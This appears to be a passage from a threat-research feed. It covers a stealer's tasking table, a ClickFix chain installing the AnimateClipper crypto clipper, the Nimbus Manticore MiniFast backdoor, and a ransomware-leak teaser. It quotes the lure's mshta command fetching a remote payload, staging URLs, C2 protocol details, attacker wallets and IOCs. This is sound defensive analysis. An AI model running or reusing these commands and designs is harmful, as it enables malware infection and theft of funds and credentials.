0File-system search + exfiltrationdata contains: path, mask, depth, size, link; plus top-level name (base64 label). path supports %ENV% expansion.Expands %ENV% paths, traverses directories with filters/limits, collects matching file contents, packages results, and uploads them to C2.
1Reserved / no-op (this build)type onlyNo task handler is executed. The agent performs only the standard loop housekeeping and proceeds to the next step.
2Registry reconnaissance (arbitrary value queries)data is a list of objects with: path, value, nameOpens keys via native NT registry APIs, queries requested values, retries using an alternate WOW64 view when needed, supports HKCU-relative paths, and returns results as labeled artifacts.
3Chromium-oriented collection + extension-driven logicUses extensions ({name, path}) and additional control flags from data (e.g., history, plus short flags observed as indb/sync).Collects Chromium artifacts (History, Login Data, Cookies, Web Data), extracts key material from Local State via DPAPI (CryptUnprotectData), and uploads the decrypted blob as a /Key artifact.
4Firefox/NSS profile discovery + profile theftUses extensions ({name, path})Searches for profile directories by checking for \\key4.db; when found, collects the Firefox/NSS artifact set (including key4.db, cert9.db, cookies.sqlite, logins.json, places.sqlite, prefs.js, extensions.webextensions.uuids) and uploads them.
5Stop / end of taskingtype onlySignals completion: the agent exits the task loop and proceeds to its post-task upload sequence before terminating.

Targets: crypto wallet, password managers, 2FA extensions

In the captured C2 traffic, the stealer received a list of 332 browser extension identifiers in encrypted task responses.

The targeting is heavily skewed toward cryptocurrency wallets and credential/secret storage:

CategoryUnique targetsWhat’s at risk (high level)
Wallets220Wallet extension state (accounts/addresses, encrypted vaults, session artifacts; exact contents depend on the wallet)
Password Managers77Password manager extension data (vault metadata, sessions, potential export artifacts depending on product/state)
2FA / TOTP18OTP/2FA companion extensions and related data (e.g., seeds/exports if present)
Notes11Notes/clipper extensions (note content, clip data)
Payments6Payment/checkout extensions (session / account-related artifacts)

Representative high-signal targets from the decoded list include:

Password managers: 1Password, Bitwarden, LastPass, Dashlane, Keeper, RoboForm, NordPass, Proton Pass, KeePassXC, Zoho Vault

Crypto wallets: MetaMask (multiple identifiers observed), Rabby Wallet, Coinbase Wallet, Trust Wallet, OKX Wallet, Binance Wallet, Bitget Wallet, Phantom (Solana), Solflare Wallet (Solana), Keplr / Cosmostation / SubWallet (Cosmos/Substrate ecosystems), TronLink, Exodus, Ronin Wallet, Tonkeeper / MyTonWallet, Yoroi (Cardano), UniSat Wallet (Bitcoin ecosystem), Suiet (Sui) / Pontem (Aptos)

2FA: Authy, 2FAS, multiple “Authenticator / TOTP / Web2FA” extensions.

Case 3: ClickFix, and a Crypto Clipper with On-Chain C2 Resolution

In this TDS branch, the user is ultimately led to a ClickFix-style phishing page (processing-in-progress-x4.t3.storage[.]dev), after which the infection chain proceeds to silently install a cryptocurrency clipper malware that some vendors identify as AnimateClipper.

Figure 16 – A phishing page using the ClickFix technique to trick the victim into silently running a malicious downloader.

The page that imitates a Cloudflare verification screen and instructs the user to run:

C:\Windows\SysWOW64\mshta.exe https://185.0xA1.0xFB[.]58/navy.7z

mshta.exe is a built-in Windows utility intended to run HTML Applications (HTA). It is often abused by threat actors because it can execute script-based content directly from a remote URL using a system binary already present on the machine.

The object fetched from https://185.0xA1.0xFB[.]58/navy.7z is not a normal 7-Zip archive. Its beginning contains an HTA page with obfuscated VBScript, which mshta.exe executes. The appended archive content is benign decoy data and does not participate in the infection chain.

The VBScript retrieves the next stage from:

http://194.150.220[.]218/4SLEYpfAk57hGubo/fo0suc2ki2.rtf

Despite the .rtf extension, this resource is a heavily obfuscated PowerShell script. After deobfuscation, we found that it reconstructs an additional PowerShell stage in memory and uses an RC4-based routine to decrypt the next payload.

That stage then downloads:

https://cdn-1415.brightcanvas[.]digital/fo0suc2ki2.rtf

This file also does not match its extension. In the observed chain, it is a ZIP archive containing a bundled Python environment, third-party libraries, Node.js modules, and a large heavily obfuscated Python script stored in node_modules.asar. Despite its name, node_modules.asar is not an Electron ASAR archive, but a Python loader disguised to blend in with the package contents.

The obfuscated script embeds a large shellcode blob directly in its body and launches it from memory. It copies the shellcode into a buffer, changes the memory protection to executable, and transfers execution to it via ntdll!LdrCallEnclave. In the sample we analyzed, the shellcode is executed in-process, inside the current bundled Python interpreter.

Once running, the shellcode acts as an in-memory loader for the next stage. It decrypts and decompresses an embedded payload container and manually maps the resulting PE payload into the same process memory. In other words, node_modules.asar is not a passive archive or Electron artifact, but the actual Python-based launch stage that executes shellcode and hands off execution to the next payload without writing the unpacked PE to disk.

Final payload: crypto clipper with on-chain C2 resolution

At a high level, the final payload is a clipboard-hijacking crypto clipper: it continuously monitors the clipboard for cryptocurrency wallet strings, identifies the wallet format locally, replaces the copied address with one of multiple attacker-controlled wallet addresses embedded in the sample, and writes the modified value back to the clipboard. In practice, this means a victim can copy a legitimate wallet address, paste it moments later, and unknowingly send funds to the attacker instead.

When executed, AnimateClipper first resolves its C2 by querying a smart contract over the public BNB Smart Chain Testnet JSON-RPC endpoint. The sample issues the following request:

POST https://data-seed-prebsc-1-s1.binance.org:8545/
{"id":1,"jsonrpc":"2.0","method":"eth_call","params":[{"to":"0x6936edc505501EBB2F202C985a021a06f1c10C9E","data":"0x3bc5de30"},"latest"]}

At the time of our analysis, the contract response resolved to the C2 domain:

kr.hugo-lapp.co

The malware uses HTTPS to communicate with the resolved C2 server. In the analyzed build, the observed logic includes periodic refresh check-ins and a second request format intended to report address-replacement activity. The replacement wallets themselves are fully embedded in the binary.

The hardcoded replacement addresses observed in the analyzed sample include:

0xA1E50DaF64fb2B342A64d848E396700962acC2d0
1PbWWqgKDBDorh525uecKaGZD21FGSoCeR
31kwGkJP9xM26cnQJLpe1CH6pjSt4DEDz2
32Epo1K92Xzo6Hayq1Fmkj21x4fUk7JZT7
bc1qcg5sx6a6evx5ls4gj6nh8d0jtamh89n2y473dr
bc1pqn73hlel3mmnza0kfl2alwkkgkapeeknufgtysll8fs2z4umdf0qpvus9q
ltc1qk437ykzdxms9k9wh5vhd7aalsv0tfx6r39rrtv
LV9AYZKQEg891crnof7PFK6u77noVM4Y45
MG1FerSxboiwjhvU2cv4n34pXz5FpC88p4
TNf4nzc6x6fZrBMLMaZZGV1SbCjShDqbaQ
r9yMnTm4NSzvG9rrwjM2ec8xZgh1cafXH8
cosmos1k5xu6njlc90r92gdwvtfjh826jduw7ptmry0q8
UQDvDUxFShoWWbHougyHjr0tFz3E38fX8e0bnTUpya-P0mXW
DH9W9S6mSSBsGeiSstgsGdiREZupQbZf9C
RRkUSs6V3Eu6gxjGDbGzcS99F5WyKtggsw
XvUreW3ZjMcDuMTowd1BZsK9CYJdk7eKJw
RMh4hfsi84LdbS4uS3jaSaNccc8kartkDJ
XALFSI6ETIZJH2N5CFT2CFOKPFDVDTZUVR7Q3L26UG74SWYGMY6X7MA46Q
XpY2GAXeKJwxSqF87BbPzD68Woy5trj8iKS1PPM
EME9M9cSy9FvfHvcx2gMPkp1H5Dj4YaKufPRsAyon8Tf
qphu2urfykunh5l42retl4aqw6xnfjkyjvcy6gjqrs

We also reviewed incoming transactions to the wallet addresses embedded in this sample. In the dataset we analyzed, the earliest inbound payments were recorded in July 2025, with the first observed transaction dated July 12, 2025. This indicates that the operation has likely been active for a prolonged period and suggests that the TDS-driven infection chain we observed may be only one of several distribution paths used to deploy the malware. While the observed on-chain inflows are modest, they nevertheless show that the embedded wallets received real funds.

Conclusion

This campaign is a reminder that “looking official” is not a meaningful security signal. The entry sites mimic legitimate open-source project portals, preserve real GitHub links to pass quick visual checks, and then use click interception to route the first download click into a gated TDS stack. From the user’s perspective, the path is deceptively simple: top Google result, polished “project” site, download. Under the hood, that single click can become a non-deterministic redirect chain that the victim never agreed to and cannot easily audit.

One of the most striking aspects of the campaign is the SessionGate branch used to deliver PUA. Its combination of server-side registration, one-time-style key release, per-session payload generation, and heavy obfuscation goes far beyond what is typically seen in commodity bundler chains. In practice, these counter-analysis measures make even obtaining the final payload unusually difficult for researchers. While such aggressive gating likely reduces overall delivery efficiency, at this campaign’s scale it is a rational tradeoff for the operators: it also reduces analyst visibility, delays detection, and helps the activity remain under the radar for longer. This is reflected in public telemetry — despite thousands of VirusTotal submissions for the initial loader and hundreds of related intermediate samples, we did not identify the final payload on VirusTotal.

Even if the upstream traffic source is not intended to distribute malware, repeated diversion of users into gray and malicious chains strongly suggests insufficient partner vetting and weak abuse prevention across the supply path. Mechanisms such as sending users somewhere other than the visible link target and handing sessions off to third-party infrastructure outside the original platform’s control are, at minimum, hallmarks of unfair and deceptive traffic practices, not transparent advertising.

More broadly, the embedded TDS layer behaves like a broker between ecosystems: it allows downstream operators to selectively receive only the sessions they want, based on GEO, browser fingerprinting, anti-bot checks, and capping. That makes attribution harder and accountability more diffuse — the impersonation operator does not need to be the malware author to enable malware delivery at scale.

Protections

Check Point Threat Emulation and Harmony Endpoint provide comprehensive coverage of attack tactics, file types, and operating systems and protect against the attacks and threats described in this report.

IOCs

TypeIndicatorDescription
SHA-256598b023e56c45b19173e8f96c1c88036d732fec305cf6bf1b9cf4dbe304beb7fSessionGate Stage 1
SHA-25674091f5a8746a1c68d73e1fc1e4e1ff514632ee3f632a8b306f35dabae2d2b64SessionGate Stage 1
SHA-25615e6df0c95f2147952308e640d55270e9d097639eaebb34d4b352415f1c6bcebSessionGate Stage 1
SHA-2563bb92771e287aa0a8bdd8e5b5bb697427223eaefded3d9b64b5d5c32ad40f3c2SessionGate Stage 1
SHA-256cbad672d9bd06ce91ce465d049e50696fbaec9d209ca0ab1fd814d993d04bc9bSessionGate Stage 1
SHA-2564cdb1f7ac502289119f7f8256f00baaa994e6ecfb4000dcf5e1c46073508fcb3SessionGate Stage 2
SHA-256cbad672d9bd06ce91ce465d049e50696fbaec9d209ca0ab1fd814d993d04bc9bSessionGate Stage 2 DLL #1
SHA-256ce0888df5e28716432013a8ae002437bd3e993fbe8362c5ff9efbddabfe0ab77SessionGate Stage 2 DLL #1
SHA-25626f2abfc254a59c2386dd46dca16744f7147a0f0366cb6008e1d53219175f44cSessionGate Stage 2 DLL #2
SHA-256e6a1a428a7c09c9946f7c0179d89b263f442dc3208b5144a9146c200e4185bd6AnimateClipper
SHA-25687361ba2bb412dcf49f8738f3b8b9b7dccb557ad2e76ea8d98ffa5b098ae3886AnimateClipper
SHA-25639dc2327fe1e5a56ac5ad9dc02f0386cff3d83dcfdc558cacba42ebb9dcc5ec2RemusStealer
SHA-2562e842eab0c16ddd1a2ec4a56610adb58d115b65a1e08e9b67e7e375f8eed0873RemusStealer
Domainappfreshstart[.]comSessionGate
Domainappgetonline[.]comSessionGate
Domainwebinnosetup[.]comSessionGate
Domainappmakingcenter[.]comSessionGate
Domainyourfastcrc[.]comSessionGate
Domainmobileversioncrc[.]comSessionGate
Domainwebcrcprove[.]comSessionGate
Domainintegritycrc[.]comSessionGate
URLhttp://buccstanor[.]pics:28313RemusStealer
URLhttp://baxe[.]pics:48261RemusStealer
URLhttp://217.156.122[.]75:1378RemusStealer
URLhttp://intem[.]lat:9592RemusStealer
URLhttp://ropea[.]top:28313RemusStealer
URLhttp://forestoaker[.]com:6290RemusStealer
URLhttp://buccstanor[.]pics:48261RemusStealer
URLhttp://94.231.205[.]229:28313RemusStealer
URLhttp://gluckcreek[.]online:48261RemusStealer
URLhttps://185.0xA1.0xFB[.]58/navy.7zAnimateClipper
URLhttp://194.150.220[.]218/4SLEYpfAk57hGubo/fo0suc2ki2.rtfAnimateClipper
URLhttps://cdn-1415.brightcanvas[.]digital/fo0suc2ki2.rtfAnimateClipper
Domainkr.hugo-lapp[.]coAnimateClipper
Domainio.hugo-lapp[.]latAnimateClipper
Domaincw.hugo-lapp[.]latAnimateClipper
Domainst.hugo-lapp[.]latAnimateClipper
Domaintd.hugo-lapp[.]latAnimateClipper
Domainfd.hugo-lapp[.]latAnimateClipper
Domained.hugo-lapp[.]latAnimateClipper
Domainflame-guard[.]ccAnimateClipper
Domaincarlessclapped[.]comAnimateClipper

The post Impersonation, Click Hijacking, and TDS: Inside a Malware Distribution Ecosystem appeared first on Check Point Research.

Fast and Furious – Nimbus Manticore Operations During the Iranian Conflict

22 May 2026 at 17:09

Key Findings

  • The Iranian, IRGC affiliated, threat actor Nimbus Manticore resurfaced during Operation Epic Fury, the US military campaign against Iran launched on February 28, 2026, demonstrating newly adopted techniques and enhanced capabilities.
  • The campaign leveraged malicious lures impersonating organizations in the aviation and software sectors across the United States, Europe and the Middle East.
  • For the first time, we observed the use of SEO poisoning as an additional malware delivery method.
  • The operation introduced a previously undocumented backdoor, named MiniFast, which appears to incorporate AI-assisted development practices, enabling the threat actor to rapidly develop and adapt tooling while maintaining high operational availability during the war.
  • The actor also used a Zoom installer’s execution flow and abused it to stage a time-sensitive infection chain for malware deployment while blending into legitimate system activity.

Introduction

During the recent geopolitical tensions in the Middle East, we reported on multiple Iran-nexus threat actors advancing Iran’s strategic objectives through cyber operations. These activities included targeting internet-connected cameras, conducting destructive attacks against US and Israeli entities, and exfiltrating data from cloud environments to support broader kinetic and intelligence-gathering efforts.

Nimbus Manticore (also tracked as UNC1549) is an IRGC-affiliated threat actor who primarily targets the defense, aviation and telecommunication sectors through career-themed phishing campaigns. Nimbus Manticore stands out compared to other Iranian-linked groups due to its complex malware toolset.

In 2025, we documented the MiniJunk malware framework used by Nimbus Manticore to target high-profile organizations across Western Europe and the Middle East.

In the recent campaign, the actor adopted several new techniques, including AppDomain (application domain) hijacking, AI-assisted malware development, and SEO poisoning.

In this article, we focus on three waves of the threat actor’s activity in the last few months, as well as discuss their latest techniques.

Figure 1 – 2026 campaign timeline during the ongoing military campaign.

Campaign 1: Rising Tension

In February 2026, amid rising tensions between the US, Israel and Iran and weeks of military buildup, we monitored new Nimbus Manticore phishing activity worldwide. In this campaign, the threat actor introduced a modified infection chain by abusing AppDomain Hijacking for execution instead of relying on the usual DLL sideloading techniques.

AppDomain Hijacking is a technique that abuses legitimate .NET applications to load a malicious DLL at launch time. This is achieved by placing a Trojanized XML .config file in the same directory as the target application. The configuration file, named after the abused binary with the .config suffix, specifies an attacker-controlled AppDomainManager class that points to a malicious DLL. When the application starts, the .NET runtime loads the DLL, enabling malicious code execution within the context of the trusted process.

Figure 2 – Config file pointing the appDomainManager class to the attacker-controlled DLL.

The phishing lure is consistent with previous Nimbus Manticore campaigns, targeting employees in selected organizations (primarily software and aviation sectors) with fake career opportunities. Targeted organizations in Saudi Arabia and Australia were directed to download a compressed ZIP archive stored on the OnlyOffice platform.

Figure 3 – ZIP file hosted on Onlyoffice.

The downloaded ZIP file contains these files:

  • Setup.exe – Benign Microsoft-signed binary.
  • Setup.exe.config – AppDomain Hijacking configuration file pointing to uevmonitor.dll.
  • uevmonitor.dll – A first stage Dropper.
  • Interop.TaskScheduler.dll – a benign DLL.

Figure 4 – Zip file masquerading as an Accenture job opportunity.

After the setup.exe binary is executed, the first-stage loader (uevmonitor.dll) is loaded. This component is responsible for extracting and deploying the next-stage payload, which is stored in encrypted form within the loader itself.

The extracted files are written into C:\Users\<USER>\AppData\Local\Packages\ and include a legitimate executable used for DLL sideloading alongside a malicious DLL identified as a new version of the MiniJunk backdoor.

The first-stage loader uevmonitor.dll shares multiple behaviors similar to older MiniJunk loader variants. These include validating that it is loaded specifically by the Setup.exe process and displaying a fake error message stating "Couldn't connect to survey server" to appear as a legitimate application failure and reduce user suspicion.

Campaign 2: During Operation Epic Fury

Figure 5 – Campaign 2: During Operation Epic Fury – Attack Chain.

During Operation Epic Fury, we continued to observe activity from the threat actor. Despite the challenging environment, Nimbus Manticore demonstrated a strong ability to rapidly adapt, maintain infrastructure, and develop new tooling. We assess that this capability was likely supported, at least in part, by LLM-based tools and AI-assisted development techniques.

In addition to career-themed phishing lures masquerading as a US-based airline, the threat actor also used a Trojanized Zoom installer, which we assess was part of a phishing campaign using fake meeting invitations. In addition, the Trojanized Zoom installer demonstrated in-depth research into the original application’s installation and execution flow, enabling it to be seamlessly integrated into the infection chain.

Similar to previous campaigns, the threat actor continued leveraging AppDomain Hijacking, not just for the initial execution stage but also during the deployment and execution of the final backdoor. For the final payload, the threat actor introduced a new backdoor that we named MiniFast, replacing the previously used MiniJunk malware family.

Many of the files used throughout the campaign had valid digital signatures via SSL.com, continuing the abuse of trusted signing infrastructure we previously documented in our 2025 report. We identified the use of at least two certificates during the current activity, including:

  • Gray Matter Software S.R.L.
  • Kirubel Kerie Negeya

Infection Chain

The infection chain begins with the victim downloading a compressed archive named Zoominstall64.zip, which contains the following files:

  • Setup.exe – Benign Microsoft-signed binary (ServiceHub.VSDetouredHost.exe).
  • Setup.exe.config – AppDomain Hijacking configuration file pointing to InitInstall.dll.
  • InitInstall.dll – First-stage loader.
  • Zoom_cm.exe – Original Zoom installer.
  • UpdateConfig.xml – AppDomain Hijacking configuration file pointing to Updater.dll.
  • Updater.dll – Second-stage loader.
  • UpdateChecker.dll – Final backdoor payload (MiniFast).

First-Stage Deployment

After Setup.exe is launched by the user, the first-stage loader (InitInstall.dll) is executed through AppDomain Hijacking using the accompanying .config file.

The loader itself is lightly obfuscated. Most readable strings are decrypted at runtime using a simple combination of ROT13 encoding and reversed-string transformations. Aside from the string obfuscation layer, the codebase contains meaningful function names and relatively well-structured logic. Execution begins with the malware displaying a fake installation progress window intended to mimic legitimate software installation activity. At the same time, the loader launches the legitimate Zoom installer (Zoom_cm.exe) to make the execution flow appear to the victim as a normal software installation.

Persistence through Task hijacking

After launching the installer, the malware enters a loop that lasts approximately one minute, continuously monitoring the system for the creation of a scheduled task matching this format:

ZoomUpdateTaskUser-<current user SID>

This scheduled task is usually created by the legitimate Zoom installer during installation.

When the task is created, the malware hijacks and modifies it to execute the second-stage component instead. By abusing an existing Zoom scheduled task rather than creating a new suspicious persistence mechanism, the malware attempts to blend into legitimate system activity and reduce detection opportunities.

Second-Stage Deployment

The next-stage files are copied into C:\Users\<USER>\AppData\Local\Zoom\bin\update. This directory contains four files copied from the original archive, including the benign Microsoft-signed binary from the first stage, now renamed to Update.exe. The malware again abuses AppDomain Hijacking to load the second-stage loader (Updater.dll) through the trusted Update.exe process.

Similar to the first stage, the second-stage loader uses the same runtime string decryption routine based on ROT13 and reversed strings.

At the beginning of its execution, the loader performs a simple anti-analysis validation intended to evade sandbox environments and automated dynamic analysis systems. The malware only continues execution if:

  • The hosting process name is update.exe
  • The parent process is svchost.exe

This execution-chain validation ensures that the DLL is loaded by the malware’s intended loader component and that execution originates from the scheduled-task persistence mechanism instead of launched directly through explorer.exe etc.

The primary purpose of the second-stage loader is to dynamically load the final MiniFast payload (UpdateChecker.dll), locate its exported function named CheckForUpdates, and execute it.

Adoption of AI

This campaign also provides multiple indications that the threat actor leveraged AI-assisted development during the malware creation. We see evidence for this in both the initial access loaders and within the MiniFast backdoor itself.

Several coding patterns and implementation details strongly suggest the use of AI-generated or AI-assisted code during development, including:

  • Excessive error handling and defensive programming logic, even around simple API calls such as GetUserName.
  • Repetitive function and method naming patterns containing descriptive or verbose identifiers.
  • Multiple detailed error-reporting strings and debug-style status messages embedded throughout the codebase.
  • Modular code organization despite the malware’s overall simplicity.

These characteristics are increasingly prevalent in malware development as threat actors leverage AI-assisted tools to accelerate development, improve code structure, and rapidly utilize new capabilities.

Campaign 3: Post Ceasfire – “SQL developer” Campaign

In April, we observed a new infection method, a fake website impersonating a download page for SQL Developer, a graphical tool used for working with databases. Users who attempted to download the software from the fake site instead received a weaponized installer that delivered the MiniFast backdoor.

Figure 6 – Screenshot of the getsqldeveloper[.]com site.

This malware delivery method differs from Nimbus Manticore’s usual infection chains which typically rely on career-themed phishing lures. In this campaign, the actor abuses search engine optimization techniques by registering dozens of domains that link to the bogus domain, getsqldeveloper[.]com. This is likely an attempt to increase the site’s visibility through link-based reputation signals.

At the time of our analysis, the malicious domain ranked high in the results returned by multiple search engines, such as Bing and DuckDuckGo, for the query “sql developer.” This increased the likelihood that users searching for legitimate SQL Developer downloads would encounter the site.

The pages also rely on keyword stuffing, repeatedly using search-oriented phrases such as “Download SQL Developer” and “SQL Developer Free,” likely to improve ranking for users searching for SQL Developer-related downloads.

MiniFast Technical Analysis

MiniFast is a 64-bit Windows PE DLL that exposes a single export named CheckForUpdates which acts as the main entry point. The DLL operates as a fully featured backdoor designed for long-term persistence and remote command execution. Analysis of multiple samples indicates the malware is undergoing active development, with the threat actor continuously modifying and improving the implant across versions.

Figure 7 – Export function CheckForUpdates structure.

Similar to the previous stage, the backdoor again appears to be executing under the expected process chain by verifying that the hosting process is named update.exe and that its parent process is svchost.exe

The implant communicates with its C2 (command and control) infrastructure using an API-style architecture with JSON-formatted data exchanges. To blend into legitimate network traffic, the malware impersonates a Chrome browser using the following hardcoded User-Agent string: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36

The backdoor implements several structured HTTP endpoints throughout the infection lifecycle:

URIMethodPurpose
/rgPOSTInitial handshake
/agent/initPOSTInitial victim registration
/agent/poll?token=GETTask retrieval
/agent/resultPOSTCommand execution result upload
/upload/PUTFile exfiltration
/files/GETFile download from the C2

Before entering its tasking loop, the malware performs basic host reconnaissance by collecting information such as the username, hostname, and domain info, and then submits the collected data as a unique clientId to the /rg endpoint using a POST request.

{
  "clientId":"<ComputerName>:<USERDOMAIN>\<UserName>",
  "type":"poll"
}

If the server responds with HTTP status code 200, the backdoor skips parsing the response body and continues executing normally. However, when the server responds with status code 400, the malware parses the returned JSON object and extracts a socketId, which acts as the session identifier for all future communications.

In addition, the server response may include updated values for pollInterval and jitterTime, allowing the operator to dynamically adjust the timing between subsequent communications with the C2 infrastructure.

{
  "socketId":"<string>",
  "pollInterval":120000,
  "jitterTime":5000
}

Next, the backdoor continues to register the infected host by again sending the machine information, this time to the /agent/init in the following format:

{
  "token": "<socketId>",
  "pcName": "<computer_name>",
  "userName": "<user_name>",
  "domainName": "<USERDOMAIN>",
  "isElevated": true_or_false
}

Only after it receives an HTTP status code 200 from the C2 server does the backdoor proceed to fetch commands for execution using a GET request to /agent/poll?token=<socketId>.

Here, the communication between the implant and the C2 server is not in a JSON format and is performed using Base64-encoded serialized task structures, where each response contains one or more encoded tasks that are later decoded and processed by the backdoor.

struct PollEnvelope {
    uint32_t task_count;
    struct TaskDescriptor {
        uint32_t len_base64;
        char     base64_task[len_base64]; // ASCII, no null terminator
    } tasks[task_count];
};

Each task is then Base64-decoded into a secondary structure, containing the opcode and associated arguments:

struct TaskRecord {
    uint8_t  opcode;
    uint8_t  pad[7];                // alignment
    custom_str_struct arg_main;     // at offset +0x08: main command argument
    custom_str_struct arg_aux;      // at offset +0x28: secondary arg (if needed)
    custom_str_struct taskId;       // at offset +0x48: unique task identifier
}

The opcode determines which capability is executed, while the remaining fields contain command arguments and task tracking identifiers. The malware implements a structured opcode-based command handler that provides operators with extensive control over infected systems.

Figure 8 – MiniFast Command switch.

The supported command set:

OpcodeCapabilityArgumentsDescription
0x02List DirectorypathLists files and folders inside a specified directory.
0x03Move / RenamesourcedestinationMoves or renames files and directories on the victim machine.
0x04Execute CommandcommandExecutes shell commands using cmd.exe /c and returns captured output.
0x05Enumerate ProcessesNoneEnumerates running processes and returns process names alongside their PIDs.
0x06Delete File / DirectorypathDeletes files or directories depending on the target type.
0x07Download FilefileUuiddestinationPathDownloads a file from the C2 server to the local machine.
0x08Upload FilepathUploads local files from the infected machine to the C2 server.
0x09Enumerate DrivesNoneLists available logical drives on the infected machine.
0x0AKill ProcesspidTerminates a process using its PID.
0x0BLoad DLLdllPathexportNameDynamically loads a DLL and invokes a specified exported function.
0x0CCreate DirectorypathCreates a new directory on the victim machine.
0x0DCreate ZIP ArchivesourcePathzipPathCreates a ZIP archive from files or directories.
0xB0Request UAC ElevationpathOrCommandAttempts to relaunch a process with elevated privileges using runas.
0xB1Install PersistencebinaryPathCreates or updates a scheduled task named WindowsSecurityUpdate.
0xF0Set Poll IntervalmillisecondsUpdates the beacon polling interval.
0xF1Idle Command AcknowledgeNoneAcknowledges an idle-time command without modifying behavior.
0xF2Set JittermillisecondsUpdates the jitter value applied to beacon intervals.
DefaultUnknown OpcodeAnyReturns an error for unsupported commands.

After executing a task, the implant serializes the execution result into a dedicated response structure which is Base64-encoded and submitted back to the C2 server through the /agent/result endpoint. The encoded result object contains the task identifier, execution status, and command output:

struct ResultEntry {
    uint32_t taskIdLen;           
    char     taskId[taskIdLen];   // unique task identifier
    uint32_t status;              // 0 = success, 1 = error
    uint8_t  resultText[resultLen]; // command output
};

Victimology

Nimbus Manticore consistently focuses on Europe, the Middle East and Africa, particularly Israel and the United Arab Emirates. However, in contrast to our previous research, the actor’s recent operations demonstrate an expansion toward aviation-sector targets in the United States.

As observed in prior campaigns, there appears to be a strong correlation between the phishing lure and the targeted sector. For example, fraudulent hiring portals impersonating aviation companies were used to target employees and organizations operating within that industry. In the current campaign, impersonate US domestic airlines suggest a deliberate focus on US-based targets.

Our findings indicate targeting extends across several strategic sectors, including aviation and software development. These sectors align with the IRGC’s broader intelligence collection priorities.

Figure 9 – Geographic Distribution of victims around the world.

Conclusion

Nimbus Manticore is one of the most sophisticated Iranian-aligned threat actors with a long-standing focus on the defense, telecommunications, and aviation sectors. The ongoing conflict in the Middle East, combined with the operational demands of wartime activity, appears to have significantly accelerated their malware evolution.

As an IRGC-affiliated entity operating under heightened geopolitical conditions, Nimbus Manticore demonstrated a rapid adoption cycle for new techniques, tooling, and operational methodologies. The actor’s activity during Operation Epic Fury highlights their increasing adaptability, particularly through the integration of AI-assisted malware development, novel infection vectors, and advanced stealth mechanisms.

IOCs

SHA256
10fd541674adadfbba99b54280f7e59732746faf2b10ce68521866f737f1e46d
eee657ffdb2af8ed6412221e7d5fbf4f5742f2ac2c88f43f12db46af0697de71
781605ce9d4a9869e846f6c9657d71437cb6240ab27ffbc4cd550c0e06996690
2c214494fd0bad31473ca8adce78a4f50847876584571e66aadeae70827ec2dc
f08b17856616d66492a24dced27f788e235f35f42fa7cd10f315000d3a2f4c03
a57ffb819fe8d98ff925c5d7b239598fe302acf5a13193d7a535040a71298fdf
63d0d3c4a7f71bdbca720903d6a99b832089cc093c64d2938e7e001e56c17ab4
74882085db2088356ed7f72f01e0404a0a98cda88ef56fb15ce74c1f36b26d27
bc3b44154518c5794ce639108e7b9c5fecb0c189607a26de1aaed518d890c7ad
ecaf493c320d201d285ef5f61d75744216e47cf1115b4af528f9a78883cc446e
44f4f7aca7f1d9bfdaf7b3736934cbe19f851a707662f8f0b0c49b383e054250
0db36a04d304ad96f9e6f97b531934594cd95a5cea9ff2c9af249201089dc864
485f182f7b74ea4013b2539275a95d21e3a9bf0082c331937af9353a324b36f3
64530d7e6ee30e4a66d9eeed6b8595c33fd72f5f73409133ca40539e5695df4c
332ba2f0297dfb1599adecc3e9067893e7cf243aa23aedce4906a4c480574c17
9e4a658e6d831c9e9bdfe11884a75b7c64812ed0a80e8495ddf6b316505acac1
43dc62cef52ebdd69e79f10015b3e13890f26c058325c0ff139c70f8d8eadcfa
8808c794c24367438f183e4be941876f1d3ecd0c8d2eb43b10d2380841d2283b
5c3362d20229597d11380f56d1f2eb39647fb6afad7be8392a7abcd18dff12f8
0291ef318576953f7f3fe287e7775ed1d7c3206119dc7b9cd6d85c02779e6e40
d4a7e9f107fe40c1a5d0139c6c6e25bf6bf57f61feff090bee28f476bb3cc3c2
38bd137c672bd58d08c4f0502f993a6561e2c3411773d1ae57ee0151a0a9d11d
f54cd38632ac9da3af3533ae93e92625cbcb04df521dbf1b6acfaa81218f9e8c
b19e06da580cf91691eda066ac9ee4b09c6e5dc26c367af12660fe1f9306eec4
9cf029daca89523d917dafed0568d11d00e45ec96b5b90b4a1f7fd4018c7da84
a13ba3c5aff46e9daf2d23df4b3e3d49dc7236c207c56f0a1433051f3450d441
dfa1e3137a032ee8561a1cd5e1a0f71a10bebb36aef7c336c878638a9c1239ee

Domains
business-startup[.]org
business-startup.azurewebsites[.]net
businessstartup.azurewebsites[.]net
buisness-centeral.azurewebsites[.]net
buisness-centeral-transportation.azurewebsites[.]net
buisness-centeral-transportation[.]com
licencemanagers.azurewebsites[.]net
licencesupporting.azurewebsites[.]net	
peerdistsvcmanagers.azurewebsites[.]net
nanomatrix.azurewebsites[.]net
PremierHealthAdvisory[.]com
PremierHealthAdvisory[.]azurewebsites.net
Premier-HealthAdvisory[.]azurewebsites.net
ramiltonsfinance[.]com
ramiltonsfinance.azurewebsites[.]net
ramiltons-finance.azurewebsites[.]net
globalitconsultants.azurewebsites[.]net
globalit-consultants.azurewebsites[.]net
global-it-consultants.azurewebsites[.]net
global-it-checkers.azurewebsites[.]net
global-it-checkbusiness.azurewebsites[.]net
global-check-itbusiness.azurewebsites[.]net
global-check-business-it.azurewebsites[.]net
globalbusiness-checkers-it.azurewebsites[.]net
getsqldeveloper[.]com

The post Fast and Furious – Nimbus Manticore Operations During the Iranian Conflict appeared first on Check Point Research.

Received — 19 May 2026 Check Point Research

Thus Spoke…The Gentlemen

13 May 2026 at 15:01

Key Points

  • On May 4th, 2026, The Gentlemen RaaS administrator acknowledged on underground forums that an internal backend database (Rocket) had been leaked. This leak exposed 9 accounts, including zeta88 (aka hastalamuerte), who runs the infrastructure, builds the locker and RaaS panel, manages payouts, and effectively acts as the administrator of the program.
  • The internal discussions provide a rare end‑to‑end view of the operation: they detail initial access paths (Fortinet and Cisco edge appliances, NTLM relay, OWA/M365 credential logs), the division of roles, the shared toolsets, and the group’s active tracking and evaluation of modern CVEs such as CVE-2024-55591, CVE-2025-32433, and CVE-2025-33073.
  • Screenshots from ransom negotiations were also leaked, showing a successful case where the group received 190,000 USD, after starting with an initial demand (anchor) of 250,000 USD.
